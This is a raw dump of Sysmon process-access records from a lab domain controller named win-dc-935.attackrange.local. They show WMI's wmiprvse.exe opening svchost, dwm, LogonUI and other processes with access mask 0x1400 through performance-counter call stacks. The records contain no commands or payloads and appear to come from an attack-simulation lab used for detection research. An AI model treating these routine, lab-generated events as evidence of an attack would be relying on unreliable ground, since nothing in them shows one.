13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 